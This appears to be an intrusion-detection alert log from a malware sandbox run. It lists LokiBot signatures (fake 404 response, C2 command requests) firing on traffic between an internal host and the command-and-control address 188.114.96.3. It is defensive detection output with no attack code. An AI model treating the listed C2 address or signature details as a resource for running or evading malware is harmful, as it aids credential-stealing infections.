2024-10-24T17:03:06.232216+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:07.418539+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:08.919860+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:11.777745+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:15.310031+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:16.352682+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:17.420331+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:18.620369+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:19.829825+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:20.922651+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:21.973153+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:23.325611+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:24.421552+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:26.571665+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:29.956285+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:31.134751+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:32.261893+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:33.465689+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:35.059300+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:36.887347+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:38.921832+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:41.883240+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:43.376184+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:44.476668+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:46.083585+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:49.605447+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:51.419744+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:53.091767+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:56.917338+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:03:58.513507+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:03.807044+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:04.868950+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:06.395715+0200	2025381	1	Malware Command and Control Activity Detected	192.168.2.5	50048	188.114.96.3	80	TCP

ET MALWARE LokiBot Fake 404 Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T17:01:59.827885+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49845	TCP
2024-10-24T17:01:59.827885+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49826	TCP
2024-10-24T17:02:10.030314+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49706	TCP
2024-10-24T17:02:11.088434+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49707	TCP
2024-10-24T17:02:12.214201+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49708	TCP
2024-10-24T17:02:13.394166+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49709	TCP
2024-10-24T17:02:16.928848+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49710	TCP
2024-10-24T17:02:20.453090+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49717	TCP
2024-10-24T17:02:21.539727+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49735	TCP
2024-10-24T17:02:22.999018+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49745	TCP
2024-10-24T17:02:24.418373+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49757	TCP
2024-10-24T17:02:25.594776+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49763	TCP
2024-10-24T17:02:26.643572+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49774	TCP
2024-10-24T17:02:27.675985+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49780	TCP
2024-10-24T17:02:28.723928+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49786	TCP
2024-10-24T17:02:29.787110+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49792	TCP
2024-10-24T17:02:30.862976+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49798	TCP
2024-10-24T17:02:33.141972+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49806	TCP
2024-10-24T17:02:34.219047+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49820	TCP
2024-10-24T17:02:37.397824+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49832	TCP
2024-10-24T17:02:39.510265+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49853	TCP
2024-10-24T17:02:40.712629+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49859	TCP
2024-10-24T17:02:42.068199+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49866	TCP
2024-10-24T17:02:43.143302+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49875	TCP
2024-10-24T17:02:45.397964+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49881	TCP
2024-10-24T17:02:46.421855+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49893	TCP
2024-10-24T17:02:47.648909+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49899	TCP
2024-10-24T17:02:50.902069+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49907	TCP
2024-10-24T17:02:53.499004+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49925	TCP
2024-10-24T17:02:58.103765+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49941	TCP
2024-10-24T17:02:59.282996+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49963	TCP
2024-10-24T17:03:00.374881+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49968	TCP
2024-10-24T17:03:01.528668+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49972	TCP
2024-10-24T17:03:03.977388+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49976	TCP
2024-10-24T17:03:05.027946+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49980	TCP
2024-10-24T17:03:06.088782+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49983	TCP
2024-10-24T17:03:07.280784+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49987	TCP
2024-10-24T17:03:08.767099+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49990	TCP
2024-10-24T17:03:11.609453+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	49995	TCP
2024-10-24T17:03:15.153010+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50002	TCP
2024-10-24T17:03:16.212370+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50010	TCP
2024-10-24T17:03:17.269422+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50013	TCP
2024-10-24T17:03:18.480624+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50019	TCP
2024-10-24T17:03:19.671516+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50022	TCP
2024-10-24T17:03:20.776248+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50023	TCP
2024-10-24T17:03:21.815600+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50024	TCP
2024-10-24T17:03:23.178818+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50025	TCP
2024-10-24T17:03:24.277018+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50026	TCP
2024-10-24T17:03:26.411090+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50027	TCP
2024-10-24T17:03:29.677638+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50028	TCP
2024-10-24T17:03:30.980283+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50029	TCP
2024-10-24T17:03:32.103057+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50030	TCP
2024-10-24T17:03:33.262858+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50031	TCP
2024-10-24T17:03:34.913154+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50032	TCP
2024-10-24T17:03:36.737558+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50033	TCP
2024-10-24T17:03:38.773124+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50034	TCP
2024-10-24T17:03:40.384389+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50035	TCP
2024-10-24T17:03:41.729284+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50036	TCP
2024-10-24T17:03:43.227867+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50037	TCP
2024-10-24T17:03:44.272391+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50038	TCP
2024-10-24T17:03:45.907116+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50039	TCP
2024-10-24T17:03:49.452542+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50040	TCP
2024-10-24T17:03:51.264591+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50041	TCP
2024-10-24T17:03:52.950650+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50042	TCP
2024-10-24T17:03:56.764327+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50043	TCP
2024-10-24T17:03:58.367518+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50044	TCP
2024-10-24T17:04:03.640563+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50045	TCP
2024-10-24T17:04:04.701192+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50046	TCP
2024-10-24T17:04:06.233149+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50047	TCP
2024-10-24T17:04:07.737626+0200	2025483	1	A Network Trojan was detected	188.114.96.3	80	192.168.2.5	50048	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T17:02:10.024741+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:11.080802+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:12.208821+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:13.387417+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:16.923354+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:20.447398+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:21.532098+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:22.993659+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:24.412934+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:25.588806+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:26.637709+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:27.669186+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:28.718139+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:29.781591+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:30.857303+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:33.136591+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:34.213681+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:35.272272+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:37.391379+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:38.478307+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:39.504866+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:40.706963+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:42.062394+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:43.137633+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:45.392280+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:46.416414+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:47.642217+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:50.896699+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:53.493288+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:58.098284+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:59.277600+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:03:00.368673+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:01.522800+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:03.971789+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:05.022507+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:06.083279+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:07.269902+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:08.761558+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:11.602829+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:15.147284+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:16.206577+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:17.263597+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:18.465606+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:19.665855+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:20.770740+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:21.810046+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:23.173241+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:24.271557+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:26.405618+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:29.670904+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:30.974836+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:32.097071+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:33.257287+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:34.907115+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:36.731690+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:38.767572+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:40.378665+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50035	188.114.96.3	80	TCP
2024-10-24T17:03:40.811483+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50036	188.114.96.3	80	TCP
2024-10-24T17:03:43.222325+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50037	188.114.96.3	80	TCP
2024-10-24T17:03:44.266809+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50038	188.114.96.3	80	TCP
2024-10-24T17:03:45.899764+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50039	188.114.96.3	80	TCP
2024-10-24T17:03:49.447135+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50040	188.114.96.3	80	TCP
2024-10-24T17:03:51.258797+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50041	188.114.96.3	80	TCP
2024-10-24T17:03:52.944528+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50042	188.114.96.3	80	TCP
2024-10-24T17:03:56.758959+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50043	188.114.96.3	80	TCP
2024-10-24T17:03:58.362070+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50044	188.114.96.3	80	TCP
2024-10-24T17:04:03.635176+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50045	188.114.96.3	80	TCP
2024-10-24T17:04:04.695816+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50046	188.114.96.3	80	TCP
2024-10-24T17:04:06.227709+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50047	188.114.96.3	80	TCP
2024-10-24T17:04:07.732122+0200	2024313	1	Malware Command and Control Activity Detected	192.168.2.5	50048	188.114.96.3	80	TCP

ET MALWARE LokiBot Request for C2 Commands Detected M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-24T17:02:10.024741+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49706	188.114.96.3	80	TCP
2024-10-24T17:02:11.080802+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49707	188.114.96.3	80	TCP
2024-10-24T17:02:12.208821+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49708	188.114.96.3	80	TCP
2024-10-24T17:02:13.387417+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49709	188.114.96.3	80	TCP
2024-10-24T17:02:16.923354+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49710	188.114.96.3	80	TCP
2024-10-24T17:02:20.447398+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49717	188.114.96.3	80	TCP
2024-10-24T17:02:21.532098+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49735	188.114.96.3	80	TCP
2024-10-24T17:02:22.993659+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49745	188.114.96.3	80	TCP
2024-10-24T17:02:24.412934+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49757	188.114.96.3	80	TCP
2024-10-24T17:02:25.588806+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49763	188.114.96.3	80	TCP
2024-10-24T17:02:26.637709+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49774	188.114.96.3	80	TCP
2024-10-24T17:02:27.669186+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49780	188.114.96.3	80	TCP
2024-10-24T17:02:28.718139+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49786	188.114.96.3	80	TCP
2024-10-24T17:02:29.781591+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49792	188.114.96.3	80	TCP
2024-10-24T17:02:30.857303+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:33.136591+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:34.213681+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:35.272272+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:37.391379+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:38.478307+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:39.504866+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:40.706963+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:42.062394+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:43.137633+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:45.392280+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:46.416414+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:47.642217+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:50.896699+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:53.493288+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:58.098284+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:59.277600+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:03:00.368673+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:01.522800+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:03.971789+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:05.022507+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:06.083279+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:07.269902+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:08.761558+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:11.602829+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:15.147284+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:16.206577+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:17.263597+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:18.465606+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:19.665855+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:20.770740+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:21.810046+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:23.173241+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:24.271557+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:26.405618+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:29.670904+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50028	188.114.96.3	80	TCP
2024-10-24T17:03:30.974836+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50029	188.114.96.3	80	TCP
2024-10-24T17:03:32.097071+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50030	188.114.96.3	80	TCP
2024-10-24T17:03:33.257287+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50031	188.114.96.3	80	TCP
2024-10-24T17:03:34.907115+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50032	188.114.96.3	80	TCP
2024-10-24T17:03:36.731690+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50033	188.114.96.3	80	TCP
2024-10-24T17:03:38.767572+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50034	188.114.96.3	80	TCP
2024-10-24T17:03:40.378665+0200	2024318	1	Malware Command and Control Activity Detected	192.168.2.5	50035	188.114.96.3	80	TCP
